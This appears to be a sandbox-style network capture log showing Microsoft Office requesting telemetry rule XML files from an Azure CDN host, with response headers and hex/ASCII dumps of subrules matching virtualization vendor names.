                                                                                                                          2024-10-13 16:21:41 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          68192.168.2.44983313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:41 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:41 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:41 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 419
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                          ETag: "0x8DC582B9FF95F80"
                                                                                                                          x-ms-request-id: 150221b2-d01e-007a-13e9-1af38c000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162141Z-17db6f7c8cfp6mfve0htepzbps00000004m0000000005723
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:41 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          69192.168.2.44983213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:41 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:41 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:41 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 477
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                          ETag: "0x8DC582BA48B5BDD"
                                                                                                                          x-ms-request-id: 401112aa-201e-005d-70d7-1aafb3000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162141Z-17db6f7c8cf4g2pjavqhm24vp400000005d00000000041v2
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:41 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          70192.168.2.44983413.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:41 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:41 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:41 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 472
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                          ETag: "0x8DC582BB650C2EC"
                                                                                                                          x-ms-request-id: a2dd0523-901e-0064-1fe2-1ae8a6000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162141Z-17db6f7c8cfnqpbkckdefmqa44000000050g00000000fcmp
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:41 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          71192.168.2.44983513.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:42 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:42 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:42 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 468
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                          ETag: "0x8DC582BB3EAF226"
                                                                                                                          x-ms-request-id: 8f8e431e-b01e-0097-6fac-1b4f33000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162142Z-17db6f7c8cfhrxld7punfw920n00000003u000000000cb6b
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:42 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          72192.168.2.44983613.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:42 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:42 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:42 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 485
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                          ETag: "0x8DC582BB9769355"
                                                                                                                          x-ms-request-id: a45e7bac-201e-003c-72f3-1a30f9000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162142Z-17db6f7c8cfwtn5x6ye8p8q9m000000003t0000000003205
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:42 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          73192.168.2.44983813.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:42 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:42 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:42 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 470
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                          ETag: "0x8DC582BBB181F65"
                                                                                                                          x-ms-request-id: e64af527-401e-0015-1bcc-1a0e8d000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162142Z-17db6f7c8cfvzwz27u5rnq9kpc00000005d000000000aaqp
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:42 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          74192.168.2.44983713.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:42 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:42 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:42 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 411
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                          ETag: "0x8DC582B989AF051"
                                                                                                                          x-ms-request-id: f1a7bbb3-001e-00a2-248a-1bd4d5000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162142Z-17db6f7c8cf6qp7g7r97wxgbqc00000004f0000000007emq
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:42 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          75192.168.2.44983913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:42 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:42 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:42 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 427
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                          ETag: "0x8DC582BB556A907"
                                                                                                                          x-ms-request-id: 9aad704f-d01e-0049-789c-1be7dc000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162142Z-17db6f7c8cfhrxld7punfw920n00000003tg00000000eh5p
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:42 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          76192.168.2.44984313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:43 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:43 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:43 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 474
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                          ETag: "0x8DC582BB3F48DAE"
                                                                                                                          x-ms-request-id: afbc31ee-301e-0020-59ca-1a6299000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162143Z-17db6f7c8cf5mtxmr1c51513n0000000059g00000000amr0
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:43 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          77192.168.2.44984213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:43 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:43 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:43 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 407
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                          ETag: "0x8DC582B9D30478D"
                                                                                                                          x-ms-request-id: 0dbfe92b-d01e-0082-7aa8-1ce489000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162143Z-17db6f7c8cf9wwz8ehu7c5p33g00000002fg000000003g17
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
